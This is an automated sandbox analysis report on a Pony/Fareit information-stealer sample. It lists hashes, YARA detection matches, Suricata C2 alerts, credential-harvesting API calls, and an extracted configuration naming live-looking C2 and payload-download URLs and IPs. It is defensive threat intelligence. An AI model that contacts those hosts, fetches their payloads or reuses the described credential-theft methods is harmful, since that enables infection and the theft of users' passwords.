Edit tour

Windows Analysis Report
8WgZHDQckx.exe

Overview

General Information

Sample name:	8WgZHDQckx.exe renamed because original name is a hash value
Original sample name:	2FBFC79462B64751C339F0B0297C748F.exe
Analysis ID:	1570690
MD5:	2fbfc79462b64751c339f0b0297c748f
SHA1:	3c07b52af2661e02e4db7dc978a83db0ba7c570f
SHA256:	2b7658a9c50bf8ee549193723e56b6500d4a193a5eb8e10871c67956d5d4e835
Tags:	exePonyuser-abuse_ch
Infos:

Detection

Pony

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Pony

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Yara detected aPLib compressed binary

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Detected potential crypto function

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Yara signature match

Classification

Process Tree

System is w10x64

8WgZHDQckx.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\8WgZHDQckx.exe" MD5: 2FBFC79462B64751C339F0B0297C748F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
EvilPony, Ponyshe	Privately modded version of the Pony stealer.	No Attribution	https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/	https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony

Malware Configuration

Threatname: Pony

{"C2 list": ["http://dynamotouren.de/4XM2f.exe", "http://208.116.13.164/b6dK7rwV.exe", "http://app.bi.com.tr/fPFa.exe", "http://www.aboessen24.de/WWkULwkq.exe", "http://72.32.185.12/rd7nr.exe", "http://6.magicalomaha.co/forum/viewtopic.php", "http://www.seigner-art.at/fPsx8i.exe", "http://6.magicalomaha.com/forum/viewtopic.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Pony	Yara detected Pony	Joe Security
00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x26ab:$a1: \Global Downloader 0x1e66:$a2: wiseftpsrvs.bin 0x250b:$a3: SiteServer %d\SFTP 0x24ff:$a4: %s\Keychain 0x2769:$a5: Connections.txt 0x2ab0:$a6: ftpshell.fsi 0x320b:$a7: inetcomm server passwords
00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp	pony	Identify Pony	Brian Wallace @botnet_hunter	0x1068:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x3252:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x88a:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0xeab:$s3: POST %s HTTP/1.0 0xed4:$s4: Accept-Encoding: identity, ;q=0 0xfe1:$s4: Accept-Encoding: identity, ;q=0
00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Pony	Yara detected Pony	Joe Security
00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x142cb:$a1: \Global Downloader 0x13a86:$a2: wiseftpsrvs.bin 0x1412b:$a3: SiteServer %d\SFTP 0x1411f:$a4: %s\Keychain 0x14389:$a5: Connections.txt 0x146d0:$a6: ftpshell.fsi 0x14e2b:$a7: inetcomm server passwords
00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp	pony	Identify Pony	Brian Wallace @botnet_hunter	0x12c88:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x14e72:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x124aa:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x12acb:$s3: POST %s HTTP/1.0 0x12af4:$s4: Accept-Encoding: identity, ;q=0 0x12c01:$s4: Accept-Encoding: identity, ;q=0
00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Pony	Yara detected Pony	Joe Security
00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x166ab:$a1: \Global Downloader 0x15e66:$a2: wiseftpsrvs.bin 0x1650b:$a3: SiteServer %d\SFTP 0x164ff:$a4: %s\Keychain 0x16769:$a5: Connections.txt 0x16ab0:$a6: ftpshell.fsi 0x1720b:$a7: inetcomm server passwords
00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp	pony	Identify Pony	Brian Wallace @botnet_hunter	0x15068:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x17252:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1488a:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x14eab:$s3: POST %s HTTP/1.0 0x14ed4:$s4: Accept-Encoding: identity, ;q=0 0x14fe1:$s4: Accept-Encoding: identity, ;q=0
Process Memory Space: 8WgZHDQckx.exe PID: 6516	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: 8WgZHDQckx.exe PID: 6516	JoeSecurity_Pony	Yara detected Pony	Joe Security
Process Memory Space: 8WgZHDQckx.exe PID: 6516	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x77b0:$a1: \Global Downloader 0x15787:$a1: \Global Downloader 0x1eb6a:$a1: \Global Downloader 0x6c30:$a2: wiseftpsrvs.bin 0x14c07:$a2: wiseftpsrvs.bin 0x1dfa9:$a2: wiseftpsrvs.bin 0x766b:$a3: SiteServer %d\SFTP 0x15642:$a3: SiteServer %d\SFTP 0x1ea25:$a3: SiteServer %d\SFTP 0x765f:$a4: %s\Keychain 0x15636:$a4: %s\Keychain 0x1ea19:$a4: %s\Keychain 0x7864:$a5: Connections.txt 0x1583b:$a5: Connections.txt 0x1ec1e:$a5: Connections.txt 0x7fab:$a6: ftpshell.fsi 0x15f82:$a6: ftpshell.fsi 0x1f302:$a6: ftpshell.fsi 0x86bb:$a7: inetcomm server passwords 0x16692:$a7: inetcomm server passwords 0x1fa12:$a7: inetcomm server passwords
Process Memory Space: 8WgZHDQckx.exe PID: 6516	pony	Identify Pony	Brian Wallace @botnet_hunter	0x5172:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x5f13:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x8fa6:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x13149:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x13eea:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x16f7d:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1c4eb:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1d28c:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x202fd:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x408f:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x4834:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x12066:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1280b:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1b405:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x1bbaa:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x5053:$s3: POST %s HTTP/1.0 0x5eb9:$s3: POST %s HTTP/1.0 0x1302a:$s3: POST %s HTTP/1.0 0x13e90:$s3: POST %s HTTP/1.0 0x1c3cc:$s3: POST %s HTTP/1.0 0x1d232:$s3: POST %s HTTP/1.0
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.8WgZHDQckx.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack	JoeSecurity_Pony	Yara detected Pony	Joe Security
0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x166ab:$a1: \Global Downloader 0x15e66:$a2: wiseftpsrvs.bin 0x1650b:$a3: SiteServer %d\SFTP 0x164ff:$a4: %s\Keychain 0x16769:$a5: Connections.txt 0x16ab0:$a6: ftpshell.fsi 0x1720b:$a7: inetcomm server passwords
0.2.8WgZHDQckx.exe.400000.0.unpack	JoeSecurity_Pony	Yara detected Pony	Joe Security
0.2.8WgZHDQckx.exe.5a0000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.8WgZHDQckx.exe.5a0000.1.unpack	JoeSecurity_Pony	Yara detected Pony	Joe Security
0.2.8WgZHDQckx.exe.400000.0.unpack	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x142ab:$a1: \Global Downloader 0x13a66:$a2: wiseftpsrvs.bin 0x1410b:$a3: SiteServer %d\SFTP 0x140ff:$a4: %s\Keychain 0x14369:$a5: Connections.txt 0x146b0:$a6: ftpshell.fsi 0x14e0b:$a7: inetcomm server passwords
0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x15068:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x17252:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1488a:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x14eab:$s3: POST %s HTTP/1.0 0x14ed4:$s4: Accept-Encoding: identity, ;q=0 0x14fe1:$s4: Accept-Encoding: identity, ;q=0
0.2.8WgZHDQckx.exe.400000.0.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x12c68:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x14e52:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1248a:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x12aab:$s3: POST %s HTTP/1.0 0x12ad4:$s4: Accept-Encoding: identity, ;q=0 0x12be1:$s4: Accept-Encoding: identity, ;q=0
0.2.8WgZHDQckx.exe.5a0000.1.unpack	Windows_Trojan_Pony_d5516fe8	unknown	unknown	0x142ab:$a1: \Global Downloader 0x13a66:$a2: wiseftpsrvs.bin 0x1410b:$a3: SiteServer %d\SFTP 0x140ff:$a4: %s\Keychain 0x14369:$a5: Connections.txt 0x146b0:$a6: ftpshell.fsi 0x14e0b:$a7: inetcomm server passwords
0.2.8WgZHDQckx.exe.5a0000.1.unpack	pony	Identify Pony	Brian Wallace @botnet_hunter	0x12c68:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x14e52:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 0x1248a:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 0x12aab:$s3: POST %s HTTP/1.0 0x12ad4:$s4: Accept-Encoding: identity, ;q=0 0x12be1:$s4: Accept-Encoding: identity, ;q=0
Click to see the 7 entries

Suricata Signatures

ET MALWARE Fareit/Pony Downloader Checkin 2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T18:27:01.150098+0100	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49730	208.91.197.44	80	TCP
2024-12-07T18:27:07.438897+0100	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49731	208.91.197.44	80	TCP
2024-12-07T18:27:13.735074+0100	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49732	208.91.197.44	80	TCP
2024-12-07T18:27:20.047745+0100	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49736	208.91.197.44	80	TCP
2024-12-07T18:27:26.360110+0100	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49740	208.91.197.44	80	TCP
2024-12-07T18:27:32.658251+0100	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49741	208.91.197.44	80	TCP
2024-12-07T18:27:38.955340+0100	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49742	208.91.197.44	80	TCP
2024-12-07T18:27:45.250773+0100	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49743	208.91.197.44	80	TCP
2024-12-07T18:27:51.533770+0100	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49744	208.91.197.44	80	TCP
2024-12-07T18:27:58.807048+0100	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49746	208.91.197.44	80	TCP
2024-12-07T18:28:05.098193+0100	2014411	1	Malware Command and Control Activity Detected	192.168.2.4	49758	208.91.197.44	80	TCP

ET MALWARE Fareit/Pony Downloader Checkin 3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T18:27:00.133063+0100	2014234	1	Malware Command and Control Activity Detected	192.168.2.4	49881	188.114.97.6	443	TCP
2024-12-07T18:27:00.133063+0100	2014234	1	Malware Command and Control Activity Detected	192.168.2.4	49883	72.32.185.12	80	TCP
2024-12-07T18:28:59.594886+0100	2014234	1	Malware Command and Control Activity Detected	192.168.2.4	49877	104.21.17.37	80	TCP

ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T18:27:00.133063+0100	2014562	1	A Network Trojan was detected	192.168.2.4	49881	188.114.97.6	443	TCP
2024-12-07T18:27:00.133063+0100	2014562	1	A Network Trojan was detected	192.168.2.4	49883	72.32.185.12	80	TCP
2024-12-07T18:27:01.150098+0100	2014562	1	A Network Trojan was detected	192.168.2.4	49730	208.91.197.44	80	TCP
2024-12-07T18:27:07.438897+0100	2014562	1	A Network Trojan was detected	192.168.2.4	49731	208.91.197.44	80	TCP
2024-12-07T18:27:13.735074+0100	2014562	1	A Network Trojan was detected	192.168.2.4	49732	208.91.197.44	80	TCP
2024-12-07T18:27:20.047745+0100	2014562	1	A Network Trojan was detected	192.168.2.4	49736	208.91.197.44	80	TCP
2024-12-07T18:27:26.360110+0100	2014562	1	A Network Trojan was detected	192.168.2.4	49740	208.91.197.44	80	TCP
2024-12-07T18:27:32.658251+0100	2014562	1	A Network Trojan was detected	192.168.2.4	49741	208.91.197.44	80	TCP
2024-12-07T18:27:38.955340+0100	2014562	1	A Network Trojan was detected	192.168.2.4	49742	208.91.197.44	80	TCP
2024-12-07T18:27:45.250773+0100	2014562	1	A Network Trojan was detected	192.168.2.4	49743	208.91.197.44	80	TCP
2024-12-07T18:27:51.533770+0100	2014562	1	A Network Trojan was detected	192.168.2.4	49744	208.91.197.44	80	TCP
2024-12-07T18:27:58.807048+0100	2014562	1	A Network Trojan was detected	192.168.2.4	49746	208.91.197.44	80	TCP
2024-12-07T18:28:05.098193+0100	2014562	1	A Network Trojan was detected	192.168.2.4	49758	208.91.197.44	80	TCP
2024-12-07T18:28:59.594886+0100	2014562	1	A Network Trojan was detected	192.168.2.4	49877	104.21.17.37	80	TCP

ET MALWARE Win32.Fareit.A/Pony Downloader Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T18:27:02.190465+0100	2013934	1	Malware Command and Control Activity Detected	192.168.2.4	49730	208.91.197.44	80	TCP
2024-12-07T18:27:08.478817+0100	2013934	1	Malware Command and Control Activity Detected	192.168.2.4	49731	208.91.197.44	80	TCP
2024-12-07T18:27:14.803645+0100	2013934	1	Malware Command and Control Activity Detected	192.168.2.4	49732	208.91.197.44	80	TCP
2024-12-07T18:27:21.096865+0100	2013934	1	Malware Command and Control Activity Detected	192.168.2.4	49736	208.91.197.44	80	TCP
2024-12-07T18:27:27.401407+0100	2013934	1	Malware Command and Control Activity Detected	192.168.2.4	49740	208.91.197.44	80	TCP
2024-12-07T18:27:33.699253+0100	2013934	1	Malware Command and Control Activity Detected	192.168.2.4	49741	208.91.197.44	80	TCP
2024-12-07T18:27:39.995146+0100	2013934	1	Malware Command and Control Activity Detected	192.168.2.4	49742	208.91.197.44	80	TCP
2024-12-07T18:27:46.290157+0100	2013934	1	Malware Command and Control Activity Detected	192.168.2.4	49743	208.91.197.44	80	TCP
2024-12-07T18:27:52.574602+0100	2013934	1	Malware Command and Control Activity Detected	192.168.2.4	49744	208.91.197.44	80	TCP
2024-12-07T18:27:59.848503+0100	2013934	1	Malware Command and Control Activity Detected	192.168.2.4	49746	208.91.197.44	80	TCP
2024-12-07T18:28:06.161576+0100	2013934	1	Malware Command and Control Activity Detected	192.168.2.4	49758	208.91.197.44	80	TCP

ET MALWARE Win32/Fareit Checkin 2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T18:27:01.150098+0100	2016550	1	Malware Command and Control Activity Detected	192.168.2.4	49730	208.91.197.44	80	TCP
2024-12-07T18:27:07.438897+0100	2016550	1	Malware Command and Control Activity Detected	192.168.2.4	49731	208.91.197.44	80	TCP
2024-12-07T18:27:13.735074+0100	2016550	1	Malware Command and Control Activity Detected	192.168.2.4	49732	208.91.197.44	80	TCP
2024-12-07T18:27:20.047745+0100	2016550	1	Malware Command and Control Activity Detected	192.168.2.4	49736	208.91.197.44	80	TCP
2024-12-07T18:27:26.360110+0100	2016550	1	Malware Command and Control Activity Detected	192.168.2.4	49740	208.91.197.44	80	TCP
2024-12-07T18:27:32.658251+0100	2016550	1	Malware Command and Control Activity Detected	192.168.2.4	49741	208.91.197.44	80	TCP
2024-12-07T18:27:38.955340+0100	2016550	1	Malware Command and Control Activity Detected	192.168.2.4	49742	208.91.197.44	80	TCP
2024-12-07T18:27:45.250773+0100	2016550	1	Malware Command and Control Activity Detected	192.168.2.4	49743	208.91.197.44	80	TCP
2024-12-07T18:27:51.533770+0100	2016550	1	Malware Command and Control Activity Detected	192.168.2.4	49744	208.91.197.44	80	TCP
2024-12-07T18:27:58.807048+0100	2016550	1	Malware Command and Control Activity Detected	192.168.2.4	49746	208.91.197.44	80	TCP
2024-12-07T18:28:05.098193+0100	2016550	1	Malware Command and Control Activity Detected	192.168.2.4	49758	208.91.197.44	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 8WgZHDQckx.exe

Avira: detected

Found malware configuration

Source: 0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack

Malware Configuration Extractor: Pony {"C2 list": ["http://dynamotouren.de/4XM2f.exe", "http://208.116.13.164/b6dK7rwV.exe", "http://app.bi.com.tr/fPFa.exe", "http://www.aboessen24.de/WWkULwkq.exe", "http://72.32.185.12/rd7nr.exe", "http://6.magicalomaha.co/forum/viewtopic.php", "http://www.seigner-art.at/fPsx8i.exe", "http://6.magicalomaha.com/forum/viewtopic.php"]}

Multi AV Scanner detection for submitted file

Source: 8WgZHDQckx.exe

ReversingLabs: Detection: 94%

Yara detected Pony

Source: Yara match	File source: 0.2.8WgZHDQckx.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8WgZHDQckx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8WgZHDQckx.exe.5a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8WgZHDQckx.exe PID: 6516, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 8WgZHDQckx.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_0040A54C lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,	0_2_0040A54C
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_0040D1E9 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,	0_2_0040D1E9
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_0040CC68 lstrlenA,CryptUnprotectData,LocalFree,	0_2_0040CC68
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_0040A94F lstrlenA,CryptUnprotectData,LocalFree,	0_2_0040A94F
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_0040BA61 CryptUnprotectData,LocalFree,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,	0_2_0040BA61
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_0040421D CryptUnprotectData,LocalFree,	0_2_0040421D
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_0040A391 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,CoTaskMemFree,	0_2_0040A391
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_0040A798 CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,	0_2_0040A798

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\8WgZHDQckx.exe

Unpacked PE file: 0.2.8WgZHDQckx.exe.400000.0.unpack

Source: 8WgZHDQckx.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: w:\google_prj\src\tiger4_v3_2.pdbU source: 8WgZHDQckx.exe
Source:	Binary string: w:\google_prj\src\tiger4_v3_2.pdb source: 8WgZHDQckx.exe

Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_00405024 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,	0_2_00405024
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_00404CB4 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	0_2_00404CB4
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_0040891F FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	0_2_0040891F
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_00403FE7 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	0_2_00403FE7
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_0040966C FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	0_2_0040966C
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	Code function: 0_2_0040879B FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	0_2_0040879B

Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\8WgZHDQckx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49758 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49740 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49740 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49740 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49758 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49758 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49743 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49743 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49743 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49730 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49743 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49741 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49736 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49736 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49736 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49740 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49736 -> 208.91.197.44:80
Source: Network traffic	Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49730 -> 208.91.197.44:80
